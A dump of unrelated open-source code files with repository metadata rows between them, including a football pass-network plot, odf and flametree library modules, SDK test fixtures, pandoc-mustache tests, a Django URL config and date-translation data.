average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
| 55.226027 | 116 | 0.615032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,987 | 0.49442 |
d5b2899060598acf5361fb2c9db968e61435c9da | 2,181 | py | Python | env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from odf.namespaces import METANS
from odf.element import Element
# Autogenerated
def AutoReload(**args):
return Element(qname = (METANS,'auto-reload'), **args)
def CreationDate(**args):
return Element(qname = (METANS,'creation-date'), **args)
def DateString(**args):
return Element(qname = (METANS,'date-string'), **args)
def DocumentStatistic(**args):
return Element(qname = (METANS,'document-statistic'), **args)
def EditingCycles(**args):
return Element(qname = (METANS,'editing-cycles'), **args)
def EditingDuration(**args):
return Element(qname = (METANS,'editing-duration'), **args)
def Generator(**args):
return Element(qname = (METANS,'generator'), **args)
def HyperlinkBehaviour(**args):
return Element(qname = (METANS,'hyperlink-behaviour'), **args)
def InitialCreator(**args):
return Element(qname = (METANS,'initial-creator'), **args)
def Keyword(**args):
return Element(qname = (METANS,'keyword'), **args)
def PrintDate(**args):
return Element(qname = (METANS,'print-date'), **args)
def PrintedBy(**args):
return Element(qname = (METANS,'printed-by'), **args)
def Template(**args):
args.setdefault('type', 'simple')
return Element(qname = (METANS,'template'), **args)
def UserDefined(**args):
return Element(qname = (METANS,'user-defined'), **args)
| 32.073529 | 80 | 0.707474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,054 | 0.483043 |
d5b2ddd3598b303bcb8230980f8ef5b2b4388ef0 | 5,712 | py | Python | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 24 | 2020-10-16T22:07:38.000Z | 2022-03-24T14:58:03.000Z | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 63 | 2020-10-26T18:26:15.000Z | 2022-03-31T17:31:02.000Z | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 10 | 2020-11-09T11:54:23.000Z | 2022-03-24T20:44:00.000Z | """Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "rbaratheon@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "tlannister@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
| 31.043478 | 98 | 0.500525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,275 | 0.573354 |
d5b58f8a34e9535374ceecc69e4b47358c97ddb9 | 1,395 | py | Python | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 165 | 2017-02-04T00:40:01.000Z | 2021-06-08T03:51:58.000Z | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 8 | 2017-02-10T00:47:09.000Z | 2021-05-30T04:38:41.000Z | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 19 | 2017-02-09T17:38:31.000Z | 2021-03-23T16:04:32.000Z | import os
import shutil
from .ZipFileManager import ZipFileManager
from .DiskFileManager import DiskFileManager
from .Directory import Directory
import string
printable = set(string.printable) - set("\x0b\x0c")
def is_hex(s):
return any(c not in printable for c in s)
def file_tree(target, replace=False):
"""Open a connection to a file tree which can be either a disk folder, a
zip archive, or an in-memory zip archive.
Parameters
----------
target
Either the path to a target folder, or a zip file, or '@memory' to write
a zip file in memory (at which case a string of the zip file is returned)
If the target is already a flametree directory, it is returned as-is.
replace
If True, will remove the target if it already exists. If False, new files
will be written inside the target and some files may be overwritten.
"""
if isinstance(target, Directory):
return target
if (not isinstance(target, str)) or is_hex(target):
return Directory(file_manager=ZipFileManager(source=target))
elif target == "@memory":
return Directory("@memory", file_manager=ZipFileManager("@memory"))
elif target.lower().endswith(".zip"):
return Directory(target, file_manager=ZipFileManager(target, replace=replace))
else:
return Directory(target, file_manager=DiskFileManager(target))
| 32.44186 | 86 | 0.703226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 615 | 0.44086 |
d5bd90ba6b204f06ed13dd7eaecdd9ec577e33cb | 5,512 | py | Python | src/models/utils_func.py | Soufiane-Fartit/cars-prices | 8eee8aa168251adab7f4947c45a78752e4145041 | [
"MIT"
] | null | null | null | src/models/utils_func.py | Soufiane-Fartit/cars-prices | 8eee8aa168251adab7f4947c45a78752e4145041 | [
"MIT"
] | null | null | null | src/models/utils_func.py | Soufiane-Fartit/cars-prices | 8eee8aa168251adab7f4947c45a78752e4145041 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
""" This module offers util functions to be called and used
in other modules
"""
from datetime import datetime
import os
import json
import pickle
import string
import random
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import tree
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
"""GENERATE A RANDOM STRING TO BE USED AS AN ID
Args:
size (int, optional): size of the string. Defaults to 6.
chars (str, optional): charachters to be used to generate the string.
Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: a random chain of charachters
"""
return "".join(random.choice(chars) for _ in range(size))
def save_model(path, model):
"""SAVE MODEL INTO PICKLE FILE
Args:
path (str): path where to save the model
model (binary): the model to be saved
"""
with open(path, "wb") as file:
pickle.dump(model, file)
def update_history(models_hist_path, model_id, model_name, model, params):
"""SAVE METADATA RELATED TO THE TRAINED MODEL INTO THE HISTORY FILE
Args:
models_hist_path (str): path to the history file
model_id (str): unique id of the model
model_name (str): model name = "model_"+model_id+".pkl"
model (binary): binary file of the model
params (dict): dictionnary containing the hyper-parameters
used to fit the model
"""
model_metadata = dict()
model_metadata["trained"] = str(datetime.now())
model_metadata["model_type"] = type(model).__name__
model_metadata["model_id"] = model_id
model_metadata["params"] = params
print(model_metadata)
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name] = model_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
json.dump({model_name: model_metadata}, outfile, indent=4)
def update_history_add_eval(
models_hist_path, model_id=None, model_name=None, metrics=None
):
"""ADD EVALUATION METRICS THE HISTORY FILE FOR THE SPECIFIED MODEL
Args:
models_hist_path (str): path to the history file
model_id (str, optional): the id of the model. Defaults to None.
model_name (str, optional): the name of the model. Defaults to None.
metrics (dict, optional): a dictionnary containing metadata related
to the model evaluation. Defaults to None.
"""
assert (
model_id is not None or model_name is not None
), "At least the model id or name must be given"
assert models_hist_path is not None, "You must specify the path to the history file"
if not model_name:
model_name = "model_" + model_id + ".pkl"
eval_metadata = dict()
eval_metadata["datetime"] = str(datetime.now())
eval_metadata["metrics"] = metrics
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name]["evaluation"] = eval_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
print("cannot save evaluation metadata")
def generate_features_importance_plot(model, features, model_id):
"""GENERATES A PLOT DESCRIBING FEATURES IMPORTANCE FOR THE MODEL
TO MAKE THE PREDICTION.
Args:
model (tree-based model): a tree based model (decision tree, random forest ...)
features (pandas dataframe): a table of the features on which we trained the model
model_id (str): the unique id of the model
"""
mean_importances = model.feature_importances_
importances_indices = np.argsort(mean_importances)[::-1]
ordered_columns = [features.columns[i] for i in importances_indices]
importances = pd.DataFrame(
[tree.feature_importances_ for tree in model.estimators_],
columns=features.columns,
)
importances = importances[ordered_columns]
_, ax = plt.subplots(figsize=(12, 8))
sns.boxplot(x="variable", y="value", ax=ax, data=pd.melt(importances))
figure = ax.get_figure()
figure.savefig(
"models/models-training/run_" + model_id + "/features_importance.png"
)
def plot_trees(rf, feature_names, target_names, model_id):
"""GENERATES A PLOT THAT SHOWS THE DECISION MAKING OF THE TREES
Args:
rf (model): a tree based model (random forest ...)
feature_names (list): names of the columns of the training set
target_names (str): name of the target columns
model_id (str): unique id of the model
"""
fn = feature_names
cn = target_names
fig, axes = plt.subplots(nrows=1, ncols=5, figsize=(10, 2), dpi=900)
for index in range(0, 5):
tree.plot_tree(
rf.estimators_[index],
feature_names=fn,
class_names=cn,
filled=True,
ax=axes[index],
)
axes[index].set_title("Estimator: " + str(index), fontsize=11)
fig.savefig("models/models-training/run_" + model_id + "/Trees.png")
def get_id_list(N=6):
print (os.getcwd())
print([x[0] for x in os.walk("../../models/models-training")])
return [x[0][-N:] for x in os.walk("../../models/models-training")][1:] | 33.815951 | 90 | 0.649492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,524 | 0.45791 |
d5c9c3dcfd93144a733bdffa2a7d7a7dc364d51d | 2,807 | py | Python | tests/test_html_escaping.py | copart/pandoc-mustache | f6ace29cd0c8d6b4d8f182eedcf36ad38a2412fa | [
"CC0-1.0"
] | 43 | 2017-12-27T05:57:00.000Z | 2022-03-18T10:07:28.000Z | tests/test_html_escaping.py | copart/pandoc-mustache | f6ace29cd0c8d6b4d8f182eedcf36ad38a2412fa | [
"CC0-1.0"
] | 10 | 2018-02-07T11:20:37.000Z | 2021-04-22T21:44:19.000Z | tests/test_html_escaping.py | copart/pandoc-mustache | f6ace29cd0c8d6b4d8f182eedcf36ad38a2412fa | [
"CC0-1.0"
] | 8 | 2018-11-05T13:10:35.000Z | 2021-08-30T18:14:02.000Z | """
Test that escaping characters for HTML is disabled.
"""
import os, subprocess
def test_escape_singlequote(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world ' universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world ' universe\n"
def test_escape_gt(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world > universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world > universe\n"
def test_escape_ampersand(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world & universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world & universe\n"
| 28.642857 | 139 | 0.617385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,322 | 0.470965 |
d5cee84d7663e55b77b23428667b37ccfb80fbf9 | 1,253 | py | Python | scripts/kconfig-split.py | Osirium/linuxkit | b710224cdf9a8425a7129cdcb84fc1af00f926d7 | [
"Apache-2.0"
] | 7,798 | 2017-04-18T15:19:24.000Z | 2022-03-30T19:34:42.000Z | scripts/kconfig-split.py | Osirium/linuxkit | b710224cdf9a8425a7129cdcb84fc1af00f926d7 | [
"Apache-2.0"
] | 1,673 | 2017-04-18T16:15:20.000Z | 2022-03-31T06:14:17.000Z | scripts/kconfig-split.py | Osirium/linuxkit | b710224cdf9a8425a7129cdcb84fc1af00f926d7 | [
"Apache-2.0"
] | 1,099 | 2017-04-18T15:19:33.000Z | 2022-03-31T20:23:20.000Z | #!/usr/bin/env python
# This is a slightly modified version of ChromiumOS' splitconfig
# https://chromium.googlesource.com/chromiumos/third_party/kernel/+/stabilize-5899.B-chromeos-3.14/chromeos/scripts/splitconfig
"""See this page for more details:
http://dev.chromium.org/chromium-os/how-tos-and-troubleshooting/kernel-configuration
"""
import os
import re
import sys
allconfigs = {}
# Parse config files
for config in sys.argv[1:]:
allconfigs[config] = set()
for line in open(config):
m = re.match("#*\s*CONFIG_(\w+)[\s=](.*)$", line)
if not m:
continue
option, value = m.groups()
allconfigs[config].add((option, value))
# Split out common config options
common = allconfigs.values()[0].copy()
for config in allconfigs.keys():
common &= allconfigs[config]
for config in allconfigs.keys():
allconfigs[config] -= common
allconfigs["common"] = common
# Generate new splitconfigs
for config in allconfigs.keys():
f = open("split-" + config, "w")
for option, value in sorted(list(allconfigs[config])):
if value == "is not set":
print >>f, "# CONFIG_%s %s" % (option, value)
else:
print >>f, "CONFIG_%s=%s" % (option, value)
f.close()
| 27.844444 | 127 | 0.651237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 505 | 0.403033 |
d5d20f7a81be3ee7ffae45e074584da66ec78259 | 210 | py | Python | multistream_select/__init__.py | Projjol/py-multistream-select | 624becaaeefa0a76d6841e27fbf7dea3240d2fe0 | [
"MIT"
] | null | null | null | multistream_select/__init__.py | Projjol/py-multistream-select | 624becaaeefa0a76d6841e27fbf7dea3240d2fe0 | [
"MIT"
] | null | null | null | multistream_select/__init__.py | Projjol/py-multistream-select | 624becaaeefa0a76d6841e27fbf7dea3240d2fe0 | [
"MIT"
] | null | null | null | __version = '0.1.0'
__all__ = ['MultiStreamSelect', 'hexify']
__author__ = 'Natnael Getahun (connect@ngetahun.me)'
__name__ = 'multistream'
from .multistream import MultiStreamSelect
from .utils import hexify
| 26.25 | 52 | 0.766667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 86 | 0.409524 |
d5e8cedec4a5704ab1636f88d9b806e93b86ff8a | 1,186 | py | Python | userManagement/management/urls.py | shubhamguptaorg/user_managementl | ad98e0e4886d9b0547b05ae424c10d8f6268d470 | [
"MIT"
] | null | null | null | userManagement/management/urls.py | shubhamguptaorg/user_managementl | ad98e0e4886d9b0547b05ae424c10d8f6268d470 | [
"MIT"
] | 4 | 2021-03-19T03:22:44.000Z | 2022-03-11T23:58:10.000Z | userManagement/management/urls.py | shubhamguptaorg/user_managementl | ad98e0e4886d9b0547b05ae424c10d8f6268d470 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path,include
from django.views.generic import TemplateView
from .views import Index,SignUp,UserDashboard,AdminDashboard,logout,showAdminData,deleteuser,activeUser,deactiveUser,UserDetailEdit,uploadImage
# from .views import Index,UserDashboard,SignUp,AdminDashboard
app_name='management'
urlpatterns = [
# path('',homepage,name="index"),
path('',Index.as_view(), name='index'),
path('signup',SignUp.as_view(),name="signup"),
path('userdashboard',UserDashboard.as_view(),name="userDashboard"),
path('admindashboard',AdminDashboard.as_view(),name="adminDashboard"),
path('admindashboard/showuserdata/',showAdminData.as_view(),name='showAdminData'),
path('admindashboard/showuserdata/deleteuser/<userId>',deleteuser,name='deleteuser'),
path('admindashboard/showuserdata/activeUser/<userId>', activeUser, name='activeUser'),
path('admindashboard/showuserdata/deactiveUser/<userId>', deactiveUser, name='deactiveUser'),
path('uploadimage/',uploadImage,name="uploadImage"),
path('editUserDetail/',UserDetailEdit.as_view(),name='userEditDetail'),
path('logout',logout,name='logout')
]
| 49.416667 | 143 | 0.764755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 502 | 0.423272 |
d5ec93a99d9c113668c2693c8d65499328f692cd | 1,489 | py | Python | zf-setup.py | Ziki2001/new-school-sdk | b606e666888e1c9813e2f1a6a64bbede3744026e | [
"MIT"
] | null | null | null | zf-setup.py | Ziki2001/new-school-sdk | b606e666888e1c9813e2f1a6a64bbede3744026e | [
"MIT"
] | null | null | null | zf-setup.py | Ziki2001/new-school-sdk | b606e666888e1c9813e2f1a6a64bbede3744026e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
:file: setup.py
:author: -Farmer
:url: https://blog.farmer233.top
:date: 2021/09/20 11:11:54
'''
from os import path
from setuptools import setup, find_packages
basedir = path.abspath(path.dirname(__file__))
with open(path.join(basedir, "README.md"), encoding='utf-8') as f:
long_description = f.read()
setup(
name="zf-school-sdk",
author="farmer.chillax",
version="1.3.2",
license='MIT',
author_email="farmer-chong@qq.com",
description="zf School SDK for Python",
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/Farmer-chong/new-school-sdk',
packages=find_packages(),
# package_data={},
package_data={"school_sdk": ['check_code/model.pkl']},
include_package_data=True,
platforms='any',
zip_safe=False,
install_requires=[
'requests',
'pyquery',
'bs4',
'Pillow',
'fake-headers',
'torch',
'torchvision',
],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.8',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
# python zf-setup.py bdist_wheel sdist
# twine upload dist/* | 26.589286 | 70 | 0.620551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 784 | 0.526528 |
d5edbea518993ed30402ca6ed7151f569ce035ff | 42 | py | Python | main.py | reflective21/iportfolio | 39db626a9754c1df44ac698f3d8988fdc4e7c6d5 | [
"MIT"
] | null | null | null | main.py | reflective21/iportfolio | 39db626a9754c1df44ac698f3d8988fdc4e7c6d5 | [
"MIT"
] | null | null | null | main.py | reflective21/iportfolio | 39db626a9754c1df44ac698f3d8988fdc4e7c6d5 | [
"MIT"
] | null | null | null | name = "David Asiru Adetomiwa"
print(name) | 21 | 30 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 23 | 0.547619 |
d5f72b6bb8de932265e3494ed6520e23b33d2b72 | 705 | py | Python | p6e8.py | yannickbf-prog/python | da4bd2c8668966359b829a8ac2a896afeca2b150 | [
"MIT"
] | null | null | null | p6e8.py | yannickbf-prog/python | da4bd2c8668966359b829a8ac2a896afeca2b150 | [
"MIT"
] | null | null | null | p6e8.py | yannickbf-prog/python | da4bd2c8668966359b829a8ac2a896afeca2b150 | [
"MIT"
] | null | null | null | #Yannick p6e8 Escribe un programa que te pida primero un número y luego te pida números hasta que la suma de los números introducidos coincida con el número inicial. El programa termina escribiendo la lista de números.
limite = int(input("Escribe limite:"))
valores = int(input("Escribe un valor:"))
listavalores = []
listavalores.append(valores)
while limite > sum(listavalores):
valores = int(input("Escribe otro valor"))
listavalores.append(valores)
print(f"El limite a superar es {limite}. La lista creada es ", end="")
for i in range(len(listavalores)):
print (listavalores[i], end=" ")
print(f"ya que la suma de estos numeros es {sum(listavalores)}")
| 30.652174 | 219 | 0.704965 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 397 | 0.559155 |
d5fb061a3a4378d9720ff3a451d5983678f6ed08 | 2,712 | py | Python | venv/lib/python3.8/site-packages/dateparser/data/date_translation_data/ebu.py | yuta-komura/vishnu | 67173b674d5f4f3be189474103612447ef69ab44 | [
"MIT"
] | 1 | 2021-11-17T04:55:14.000Z | 2021-11-17T04:55:14.000Z | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
info = {
"name": "ebu",
"date_order": "DMY",
"january": [
"mweri wa mbere",
"mbe"
],
"february": [
"mweri wa kaĩri",
"kai"
],
"march": [
"mweri wa kathatũ",
"kat"
],
"april": [
"mweri wa kana",
"kan"
],
"may": [
"mweri wa gatano",
"gat"
],
"june": [
"mweri wa gatantatũ",
"gan"
],
"july": [
"mweri wa mũgwanja",
"mug"
],
"august": [
"mweri wa kanana",
"knn"
],
"september": [
"mweri wa kenda",
"ken"
],
"october": [
"mweri wa ikũmi",
"iku"
],
"november": [
"mweri wa ikũmi na ũmwe",
"imw"
],
"december": [
"mweri wa ikũmi na kaĩrĩ",
"igi"
],
"monday": [
"njumatatu",
"tat"
],
"tuesday": [
"njumaine",
"ine"
],
"wednesday": [
"njumatano",
"tan"
],
"thursday": [
"aramithi",
"arm"
],
"friday": [
"njumaa",
"maa"
],
"saturday": [
"njumamothii",
"nmm"
],
"sunday": [
"kiumia",
"kma"
],
"am": [
"ki"
],
"pm": [
"ut"
],
"year": [
"mwaka"
],
"month": [
"mweri"
],
"week": [
"kiumia"
],
"day": [
"mũthenya"
],
"hour": [
"ithaa"
],
"minute": [
"ndagĩka"
],
"second": [
"sekondi"
],
"relative-type": {
"1 year ago": [
"last year"
],
"0 year ago": [
"this year"
],
"in 1 year": [
"next year"
],
"1 month ago": [
"last month"
],
"0 month ago": [
"this month"
],
"in 1 month": [
"next month"
],
"1 week ago": [
"last week"
],
"0 week ago": [
"this week"
],
"in 1 week": [
"next week"
],
"1 day ago": [
"ĩgoro"
],
"0 day ago": [
"ũmũnthĩ"
],
"in 1 day": [
"rũciũ"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 second ago": [
"now"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
| 15.859649 | 34 | 0.289823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,145 | 0.419107 |
d5fc2fcc2b0439d566be57074eaeae0f3e82e072 | 129 | py | Python | deepa2/preptrain/__init__.py | debatelab/deepa2 | 1a9e8c357d7e3924808c703ec9f4a6611a4b5f93 | [
"Apache-2.0"
] | null | null | null | deepa2/preptrain/__init__.py | debatelab/deepa2 | 1a9e8c357d7e3924808c703ec9f4a6611a4b5f93 | [
"Apache-2.0"
] | null | null | null | deepa2/preptrain/__init__.py | debatelab/deepa2 | 1a9e8c357d7e3924808c703ec9f4a6611a4b5f93 | [
"Apache-2.0"
] | null | null | null | """Preprocessing DeepA2 datasets for LM training"""
# flake8: noqa
from deepa2.preptrain.t2tpreprocessor import T2TPreprocessor
